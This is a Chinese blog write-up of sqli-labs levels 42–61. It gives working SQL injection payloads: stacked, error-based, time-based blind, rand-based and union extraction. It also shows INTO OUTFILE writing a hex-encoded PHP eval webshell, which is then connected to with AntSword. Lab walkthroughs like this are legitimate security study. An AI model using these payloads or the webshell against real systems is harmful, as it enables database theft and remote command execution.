

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="Yu ting">
  <meta name="keywords" content="">
  <title>sqli-labs(七) - Fearless&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.1.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"fearless0923.github.io","root":"/","version":"1.8.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"copy_btn":true,"image_zoom":{"enable":true},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="Fearless's blog" type="application/atom+xml">
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Fluid</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="sqli-labs(七)">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-12-17 23:04" pubdate>
        December 17, 2020 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.1k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      13
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">sqli-labs(七)</h1>
            
            <div class="markdown-body">
              <h1>Less-42</h1>
<p>初看页面,考虑到二次注入，查看update的源码：</p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/1.jpg" srcset="/img/loading.gif" alt="1"></p>
<p>数据需经函数处理，故不能进行二次注入，再查看login的代码：</p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/2.jpg" srcset="/img/loading.gif" alt="2"></p>
<p>密码无函数处理，在密码进行注入<code>a';create table hi like users#</code></p>
<p>注入前：</p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/3.jpg" srcset="/img/loading.gif" alt="3"></p>
<p>注入后:</p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/4.jpg" srcset="/img/loading.gif" alt="4"></p>
<h1>Less-46</h1>
<p>在之前的MySQL里有介绍查询语句：<code>select &lt;列名&gt; from &lt;表名&gt; [where &lt;查询条件表达试&gt;] [order by &lt;排序的列名&gt;[asc或desc]]</code>,而46关就与此相关。先看源码：</p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/5.jpg" srcset="/img/loading.gif" alt="5"></p>
<p>发现这关使用sort代替id，并且为数字型注入，试改变sort的值：</p>
<img src="/2020/12/17/sqli-labs%E4%B8%83/6.jpg" srcset="/img/loading.gif" alt="6" style="zoom:50%;">
<p>在后接上asc(升序)或者desc(降序);</p>
<img src="/2020/12/17/sqli-labs%E4%B8%83/7.jpg" srcset="/img/loading.gif" alt="7" style="zoom:50%;">
<p>发现修改order by 后面的参数执行结果不同，推测注入点在<code>order by</code>后的参数中，查询官方文件：<a target="_blank" rel="noopener" href="https://dev.mysql.com/doc/refman/8.0/en/select.html">MySQL</a></p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/8.jpg" srcset="/img/loading.gif" alt="8"></p>
<p>可利用order by 后参数进行注入。开始尝试：</p>
<h4 id="法一：报错注入"><a class="header-anchor" href="#法一：报错注入">🍭</a>法一：报错注入</h4>
<p><code>?sort=1 and updatexml(1,concat(0x7e,database()),1)</code></p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/9.jpg" srcset="/img/loading.gif" alt="9"></p>
<p>也可以用floor():</p>
<p><code>?sort=(select count(*) from information_schema.schemata group by concat_ws('-',(select database()),floor(rand()*2)))</code></p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/12.jpg" srcset="/img/loading.gif" alt="12"></p>
<p>也可以用extractvalue():</p>
<p><code>and extractvalue(1,concat(0x7e,(select database()),0x7e))</code></p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/16.jpg" srcset="/img/loading.gif" alt="16"></p>
<h4 id="法二：时间盲注"><a class="header-anchor" href="#法二：时间盲注">🍭</a>法二：时间盲注</h4>
<p><code>and if(left(database(),8)='security',sleep(5),1)--+</code></p>
<img src="/2020/12/17/sqli-labs%E4%B8%83/10.jpg" srcset="/img/loading.gif" alt="10" style="zoom:50%;">
<p>但是我发现在错误的情况下，休眠时间超过5秒网页还会报错，在数据库里操作:</p>
<img src="/2020/12/17/sqli-labs%E4%B8%83/11.jpg" srcset="/img/loading.gif" alt="11" style="zoom:50%;">
<p>好像挺正常的，可是在火狐里就是很诡异，有个说法是添加<code>sleep(N)</code>这个函数后，语句的执行具体会停留多长时间取决于<strong>满足条件的记录数</strong>，MySQL 会对<strong>每条</strong>满足条件的记录停留 N 秒钟，可如果因为这个的话，应该是延时很久，不至于网页报错啊。。。。。。</p>
<h4 id="法三：rand-函数"><a class="header-anchor" href="#法三：rand-函数">🍭</a>法三：rand()函数</h4>
<p>格式：<code>?sort=rand(sql 语句)</code></p>
<p>rand(true):</p>
<img src="/2020/12/17/sqli-labs%E4%B8%83/13.jpg" srcset="/img/loading.gif" alt="13" style="zoom:50%;">
<p>rand(flase):</p>
<img src="/2020/12/17/sqli-labs%E4%B8%83/15.jpg" srcset="/img/loading.gif" alt="15" style="zoom:50%;">
<p><code>?sort=rand(left(database(),8)='security')</code>:</p>
<img src="/2020/12/17/sqli-labs%E4%B8%83/14.jpg" srcset="/img/loading.gif" alt="14" style="zoom:50%;">
<p>页面和true一样，故该语句正确。</p>
<h4 id="法四-一句话木马"><a class="header-anchor" href="#法四-一句话木马">🍭</a>法四:一句话木马</h4>
<p>先介绍一个语法：</p>
<pre><code class="hljs livecodeserver"><span class="hljs-keyword">lines</span> terminated <span class="hljs-keyword">by</span> <span class="hljs-number">0</span>x*<span class="hljs-comment">*//每行输出以0x**结尾</span></code></pre>
<p>接下来要导文件，可能有人会遇到一样的问题，执行导文件命令后报错：The MySQL server is running with the --secure-file-priv option so it cannot execute，需到MySQL命令里查询：</p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/17.jpg" srcset="/img/loading.gif" alt="17"></p>
<p>值为null,表示限制mysqld 不允许导入导出，需到MySQL配置文件里更改<code>secure_file_priv =</code>为空白</p>
<p>再查询：</p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/18.jpg" srcset="/img/loading.gif" alt="18"></p>
<p>即可导出文件。</p>
<p><code>?sort=1 into outfile &quot;D:\\phpstudy_pro\\WWW\\sql\\less-46\\lll.php&quot; lines terminated by 0x3c3f706870206576616c28245f504f53545b22636d64225d293b3f3e --+</code>(<strong>0x一定要记得加，一开始忘记加一直报错。。。</strong>)</p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/19.jpg" srcset="/img/loading.gif" alt="19"></p>
<p>在目录里可找到如上文件，连接到蚁剑：</p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/20.jpg" srcset="/img/loading.gif" alt="20"></p>
<p>47关单引号包裹其余相同，48关除了不报错其余也一样，49关单引号包裹无回显。</p>
<h1>Less-50</h1>
<p>查源码：</p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/21.jpg" srcset="/img/loading.gif" alt="21"></p>
<p>用了mysqli_multi_query()函数：执行一个或多个针对数据库的查询。故可用堆叠注入：</p>
<p><code>?sort=1; create table hhh like users;</code></p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/22.jpg" srcset="/img/loading.gif" alt="22"></p>
<p>之前的方法仍适用,也可以堆叠方法构造一句话木马。51关单引号包裹其余相同。52关没有回显，其余与50关相同，53关单引号包裹也无回显，其余相同。</p>
<h1>Less-54</h1>
<p>接下来是进阶学习，这一关主要考察字符型注入，但是只能尝试十次，这里的表名和密码等是每十次尝试后就强制进行更换。</p>
<p>盲猜单引号注入：</p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/23.jpg" srcset="/img/loading.gif" alt="23"></p>
<p>查字段数：</p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/24.jpg" srcset="/img/loading.gif" alt="24"></p>
<p>爆表:</p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/25.jpg" srcset="/img/loading.gif" alt="25"></p>
<p>爆列：<img src="/2020/12/17/sqli-labs%E4%B8%83/26.jpg" srcset="/img/loading.gif" alt="26"></p>
<p>爆值:</p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/27.jpg" srcset="/img/loading.gif" alt="27"></p>
<p>输入密钥：</p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/28.jpg" srcset="/img/loading.gif" alt="28"></p>
<h1>Less-55</h1>
<p>这关有点奇葩我试了七次才试出闭合方式，居然是数字型的小括号包裹：</p>
<p><code>?id=1)--+</code></p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/29.jpg" srcset="/img/loading.gif" alt="29"></p>
<p>爆表：</p>
<p><code>?id=0) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+</code></p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/30.jpg" srcset="/img/loading.gif" alt="30"></p>
<p>爆列：</p>
<p><code>?id=0） union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='8dzw16d8m5'--+</code></p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/31.jpg" srcset="/img/loading.gif" alt="31"></p>
<p>爆值：</p>
<p><code>?id=0) union select 1,2,group_concat(secret_97U6) from challenges.8dzw16d8m5--+</code><img src="/2020/12/17/sqli-labs%E4%B8%83/32.jpg" srcset="/img/loading.gif" alt="32"></p>
<p>成功~~:</p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/33.jpg" srcset="/img/loading.gif" alt="33"></p>
<p>56关为<code>')</code>包裹，57为双引号包裹。</p>
<h1>Less-58</h1>
<p>在之前的关卡中报错都被注释，报错注入就不能使用，故前面的操作次数较多，而此关只有五次，查看源代码：</p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/34-1608353774465.jpg" srcset="/img/loading.gif" alt="34"></p>
<p>报错没有被注释，故用报错注入。</p>
<p>单引号包裹：</p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/35.jpg" srcset="/img/loading.gif" alt="35"></p>
<p>爆表：</p>
<p><code>?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges') ),1)--+</code></p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/36.jpg" srcset="/img/loading.gif" alt="36"></p>
<p>爆列:</p>
<p><code>?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where  table_name='933h2rr0c5' )),1)--+</code><img src="/2020/12/17/sqli-labs%E4%B8%83/37.jpg" srcset="/img/loading.gif" alt="37"></p>
<p>爆值：</p>
<p><code>?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_GJ8R) from challenges.933h2rr0c5 )),1)--+</code><img src="/2020/12/17/sqli-labs%E4%B8%83/38.jpg" srcset="/img/loading.gif" alt="38"></p>
<p>成功：</p>
<p><img src="/2020/12/17/sqli-labs%E4%B8%83/39.jpg" srcset="/img/loading.gif" alt="39"></p>
<p>59数字型注入，60<code>&quot;)</code>包裹，61关值得注意的是它是<code>'))'</code>包裹的，第一遍我试了四次才出来，这个故事告诉我们要打破前面关卡的固有思维。。。。。</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/12/26/dvwa%E4%BA%8C/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">DVWA||Brute Force</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/12/14/sqli-labs%E5%85%AD/">
                        <span class="hidden-mobile">sqli-labs（六）</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":200})
    NProgress.start()
    document.addEventListener('DOMContentLoaded', function() {
      window.NProgress && window.NProgress.inc();
    })
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.staticfile.org/jquery/3.5.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.staticfile.org/tocbot/4.12.0/tocbot.min.js" ></script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>





  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>
